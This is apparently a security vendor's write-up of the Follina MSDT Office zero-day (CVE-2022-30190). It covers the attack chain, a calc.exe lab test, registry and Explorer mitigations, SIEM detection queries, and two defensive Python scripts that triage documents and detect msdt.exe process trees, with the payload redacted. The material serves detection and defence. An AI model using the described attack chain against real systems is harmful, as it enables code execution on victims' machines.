Researchers have spotted a new Microsoft Office zero-day exploit in the wild: a flaw in Microsoft Office that can be abused to achieve arbitrary code execution on affected Windows systems.
The vulnerability is tracked as CVE-2022-30190, the Microsoft Support Diagnostic Tool (MSDT) vulnerability. A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs; view, change or delete data; or create new accounts in the context allowed by the user's rights. Note that the code runs as the logged-on user, not as SYSTEM, so running Office under a standard (non-administrator) account limits what a successful exploit can do immediately.
The vulnerability was discovered by an independent cybersecurity research team named nao_sec.
Why the Name Follina?
The InfoSec community refers to this vulnerability as 'Follina'. Security researchers gave it that name after a sample of an infected Word document called 05-2022-0438.doc was uploaded to VirusTotal from an IP address in Belarus. The 05-2022 part (May 2022) looks self-explanatory, but what about 0438? It is the telephone area code for Follina, Italy. There is no evidence that the malware originated there, or that the number has anything to do with the exploit at all.
- Office 2013 and later versions are affected by the Follina zero-day, according to researchers.
- Some versions of Office included with a Microsoft 365 licence can also be targeted, on both Windows 10 and Windows 11.
How Does It Work?
Basically, the exploit works like this:
- You open a booby-trapped DOC file, which you might have received in a phishing email.
- The document references an external https: URL, which Word fetches when the document is opened.
- The content fetched from that URL in turn references a URL that uses the ms-msdt: scheme in place of https:.
- Under Windows, ms-msdt: is a proprietary URL scheme that launches the MSDT software toolkit.
- MSDT is short for Microsoft Support Diagnostic Tool.
- The command line passed to MSDT via the URL causes it to run untrusted code.
When invoked, the malicious ms-msdt: link triggers an MSDT command with command-line arguments such as msdt /id pcwdiagnostic ….
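The first link in that chain, the external https: reference inside the document, can be found without opening the file in Word. The script below is an added example written for this write-up; it is not code from the original post or from Seccom Global. It assumes, based on public analyses of the sample rather than on anything stated above, that the reference is stored as an oleObject relationship with TargetMode="External" in a .rels part such as word/_rels/document.xml.rels, and it also looks for the ms-msdt: scheme carried directly inside the package. The two documents it inspects are constructed in memory, the URL points at a reserved placeholder domain and is never fetched, and legacy binary .doc files (which are not OOXML zips) are reported as unsupported.

```python
"""Static triage of an Office document for the Follina delivery pattern.

Added example for this write-up, not code from the original post or from
Seccom Global. Assumption (from public analyses of the sample, not from the
page): the external https: reference is an oleObject relationship with
TargetMode="External" in a .rels part. Inputs are constructed in memory.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
MSDT_SCHEME = re.compile(rb"ms-msdt:", re.IGNORECASE)


def build_docx(rels_xml: str) -> bytes:
    """Constructed test input: a minimal docx-shaped zip carrying the given rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?>'
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", '<?xml version="1.0"?>'
                    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed: an ordinary document whose OLE object is embedded (internal target).
BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
  <Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{OLE_OBJECT_REL}" Target="embeddings/oleObject1.bin"/>
</Relationships>'''

# Constructed: the Follina shape, an OLE object linked to an external https: URL.
# The host is a placeholder on a reserved domain; the trailing "!" mirrors the public sample.
SUSPECT_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
  <Relationship Id="rId1" Type="{STYLES_REL}" Target="styles.xml"/>
  <Relationship Id="rId5" Type="{OLE_OBJECT_REL}" Target="https://stage.example.invalid/payload.html!" TargetMode="External"/>
</Relationships>'''


def external_ole_targets(docx: bytes) -> list:
    """Return (rels_part, url) for every oleObject relationship linked to an external http(s) URL."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(part))
            except ET.ParseError:
                continue  # a damaged rels part deserves a look too, but not by this function
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_OBJECT_REL
                        and rel.get("TargetMode") == "External"
                        and target.lower().startswith(("http://", "https://"))):
                    found.append((part, target))
    return found


def parts_mentioning_msdt(docx: bytes) -> list:
    """Return zip members that carry the ms-msdt: scheme themselves (no staging server involved)."""
    with zipfile.ZipFile(io.BytesIO(docx)) as zf:
        return [p for p in zf.namelist() if MSDT_SCHEME.search(zf.read(p))]


def triage(docx: bytes) -> dict:
    """Classify a document as clean, suspect (needs analyst review) or unsupported."""
    if not zipfile.is_zipfile(io.BytesIO(docx)):
        return {"external_ole_targets": [], "msdt_parts": [], "verdict": "unsupported"}
    ole = external_ole_targets(docx)
    msdt = parts_mentioning_msdt(docx)
    return {
        "external_ole_targets": ole,
        "msdt_parts": msdt,
        "verdict": "suspect" if ole or msdt else "clean",
    }


if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspect", SUSPECT_RELS)):
        print(label, triage(build_docx(rels)))
```

A linked external OLE object is not proof of malice on its own (linked objects are a legitimate Word feature), which is why the verdict is "suspect" rather than "malicious": the URL should be pulled and inspected in a sandbox for the ms-msdt: redirect before the document is declared an exploit.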
If msdt /id pcwdiagnostic is run manually, without any other parameters, it loads MSDT and opens the Program Compatibility Troubleshooter, which looks innocent enough, like this:
In the image above, we used Kali as the attacker machine (left) and a Windows machine as the victim (right).
Once the malicious DOC file is opened, MSDT starts; we used a harmless payload that launches the Calculator (calc.exe) to confirm that the script actually executed. On the Kali machine you can see the victim's HTTP requests arriving at the attacker-controlled server.
From there, you can choose an app to troubleshoot, answer a series of support-related questions, run various automated tests on the application and, if you are still stuck, report the problem to Microsoft, sending assorted troubleshooting data along with the report.
Although you probably did not expect to be dropped into the PCWDiagnostic utility simply by opening a document, you would at least expect to see a series of pop-up dialog boxes and to be able to choose what to do at each step. The parameters supplied through the ms-msdt: URL bypass that interaction, which is what makes the flaw dangerous.
At the time of writing, Microsoft has not released an update for this vulnerability, but it has published a temporary workaround. There are a few things you can do to stop some or all of the "features" used in this type of attack.
1. Unregister the ms-msdt URL protocol
Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system. Troubleshooters remain reachable through the Get Help application and the Settings app. Follow these steps to disable the protocol:
- Run Command Prompt as Administrator.
- Back up the registry key: reg export HKEY_CLASSES_ROOT\ms-msdt filename (replace filename with the path where the backup should be written).
- Delete the key: reg delete HKEY_CLASSES_ROOT\ms-msdt /f
- To undo the workaround once a patch is installed, run reg import filename from an elevated prompt using the backup taken in the second step.
2. Disable the preview pane in Windows Explorer
With the preview pane enabled, a malicious document can be rendered, and the exploit triggered, when the file is merely selected in File Explorer rather than opened. To hide the pane:
- Open File Explorer.
- Click the View tab.
- Click Preview Pane to hide it.
How Does Seccom Detect and Respond to This Vulnerability?
As soon as our threat researchers learned of the Follina vulnerability, they worked with each customer to make sure all of the preventive measures described above were applied.
Once that was done, we carried out a retrospective threat hunt to confirm that no suspicious commands or arbitrary code had been executed with the Office process that opened the DOC file (WINWORD.EXE) as the parent and msdt.exe as the child, the process pattern that Follina exploitation leaves behind.
In parallel, our team created detection and prevention rules across all our platforms so that any such abnormal activity is detected and blocked directly.
- Behaviour-based detection and prevention rules have been implemented so that any such abnormal behaviour is detected and prevented immediately.
- Our MDR agent blocks suspicious commands, msdt.exe launches included, and terminates the entire process tree started by them.
Seccom Global's MDR agent already blocks this behaviour by default.
A retrospective threat hunt was performed by our threat hunters across the entire customer base to identify any suspicious activity related to this vulnerability.
Some of the queries used for detection (ECS-style field names, as in the SIEM they were written for):
#1 – process.parent.name:"WINWORD.EXE" AND process.name:"msdt.exe" AND process.command_line:(*PCWDiagnostic* OR *IT_RebrowseForFile* OR *IT_BrowseForFile*)
#1b – process.parent.name:"sdiagnhost.exe" AND process.name:(csc.exe OR conhost.exe)
Keep process names on process.parent.name and process.name rather than on process.command_line: the command line of msdt.exe carries the ms-msdt: URL and its PCWDiagnostic parameters, not the name of the Word process that launched it or of sdiagnhost.exe, csc.exe and conhost.exe that it goes on to spawn, so a query that looks for those names inside the msdt.exe command line never matches. The troubleshooter parameter names are IT_RebrowseForFile and IT_BrowseForFile; variants such as IT_ReBrowserForFile or IT_BrowserForFile do not match real events.
#2 – process.command_line:* AND process.name:"msdt.exe"
Query #2 returns every msdt.exe launch, including legitimate troubleshooters started by users, so it is a hunting baseline to review rather than an alerting rule.
Windows Event Detection Query:
Event_ID = "105" AND Process_name = "MSDT.exe"
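The same parent/child logic expressed by the queries above, and by the retrospective hunt for an Office parent with an msdt.exe child, can be run over process-creation telemetry directly. The script below is an added example for this write-up; it is not code from the original post, from Seccom Global or from any SIEM or EDR product. The events are constructed Sysmon-like process-creation records whose PIDs, paths and command lines are invented for illustration; the indicator strings follow the queries above, with the troubleshooter parameters spelled as msdt.exe uses them. It walks the process tree so that whatever sdiagnhost.exe spawns under a flagged msdt.exe inherits the verdict, rates an msdt.exe launch with Follina parameters from a non-Office parent lower than one launched by Word, and leaves an ordinary interactive troubleshooter alone, which is the noise that query #2 on its own would not filter.

```python
"""Process-tree detection for Follina-style msdt.exe abuse.

Added example for this write-up, not code from the original post, from Seccom
Global or from any SIEM or EDR product. EVENTS are constructed Sysmon-like
process-creation records; PIDs, paths and command lines are invented.
"""
import re

OFFICE_PARENTS = {"winword.exe"}  # the page covers Word; add other Office hosts as required
MSDT_INDICATORS = re.compile(r"ms-msdt:|PCWDiagnostic|IT_RebrowseForFile|IT_BrowseForFile",
                             re.IGNORECASE)

EVENTS = [
    {"pid": 100, "ppid": 1, "name": "explorer.exe",
     "command_line": r"C:\WINDOWS\Explorer.EXE"},
    {"pid": 200, "ppid": 100, "name": "WINWORD.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\victim\Downloads\05-2022-0438.doc"'},
    # The Follina launch: Word is the parent, the URL carries the PCWDiagnostic parameters
    {"pid": 300, "ppid": 200, "name": "msdt.exe",
     "command_line": r'C:\WINDOWS\system32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_BrowseForFile=<payload redacted>"'},
    # The troubleshooter script host and what it spawned (csc.exe compiles the script; calc.exe is the lab payload)
    {"pid": 400, "ppid": 300, "name": "sdiagnhost.exe",
     "command_line": r"C:\WINDOWS\System32\sdiagnhost.exe -Embedding"},
    {"pid": 500, "ppid": 400, "name": "csc.exe",
     "command_line": r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /noconfig /fullpaths @"C:\Users\victim\AppData\Local\Temp\abc.cmdline"'},
    {"pid": 600, "ppid": 400, "name": "calc.exe",
     "command_line": r"C:\WINDOWS\system32\calc.exe"},
    # A legitimate troubleshooter started interactively: no Office parent, no Follina parameters
    {"pid": 700, "ppid": 100, "name": "msdt.exe",
     "command_line": r"C:\WINDOWS\system32\msdt.exe -id NetworkDiagnosticsWeb"},
    # Same Follina parameters but a non-Office parent (constructed), e.g. a preview-style trigger
    {"pid": 800, "ppid": 100, "name": "msdt.exe",
     "command_line": r'C:\WINDOWS\system32\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_BrowseForFile=<payload redacted>"'},
]


def ancestors(by_pid, event):
    """Yield ancestor events of `event`, nearest first, guarding against PID-reuse loops."""
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        yield cur
        seen.add(cur["pid"])
        cur = by_pid.get(cur["ppid"])


def msdt_risk(event, parent):
    """Severity and reason for an msdt.exe launch given its parent event (None if unknown)."""
    pname = parent["name"].lower() if parent else ""
    indicators = sorted({m.lower() for m in MSDT_INDICATORS.findall(event["command_line"])})
    if pname in OFFICE_PARENTS:
        return "high", f"msdt.exe spawned by {pname}"
    if indicators:
        return "medium", f"msdt.exe with Follina parameters ({', '.join(indicators)}) from {pname or 'unknown parent'}"
    return None


def detect(events):
    """Return alerts for msdt.exe launches matching the Follina pattern and for their descendants."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        chain = list(ancestors(by_pid, e))  # nearest ancestor first
        parent = chain[0] if chain else None
        if e["name"].lower() == "msdt.exe":
            risk = msdt_risk(e, parent)
            if risk:
                alerts.append({"pid": e["pid"], "name": e["name"], "severity": risk[0], "reason": risk[1]})
        elif parent is not None and parent["name"].lower() == "sdiagnhost.exe":
            # sdiagnhost.exe is the script host msdt.exe uses; anything it spawns inherits
            # the verdict of the msdt.exe that started the troubleshooter.
            for i, anc in enumerate(chain):
                if anc["name"].lower() == "msdt.exe":
                    grand = chain[i + 1] if i + 1 < len(chain) else None
                    risk = msdt_risk(anc, grand)
                    if risk:
                        alerts.append({"pid": e["pid"], "name": e["name"], "severity": risk[0],
                                       "reason": f"{e['name']} spawned by sdiagnhost.exe under flagged msdt.exe (pid {anc['pid']})"})
                    break
    return alerts


if __name__ == "__main__":
    for a in detect(EVENTS):
        print(f"[{a['severity']}] pid {a['pid']} {a['name']}: {a['reason']}")
```

Run against the constructed events it flags the Word-spawned msdt.exe and the csc.exe and calc.exe descendants as high, the non-Office launch carrying PCWDiagnostic parameters as medium, and nothing for the interactive NetworkDiagnosticsWeb troubleshooter. In a real pipeline the same two checks map directly onto the SIEM fields: process.parent.name for the Office-parent test and process.command_line for the parameter test.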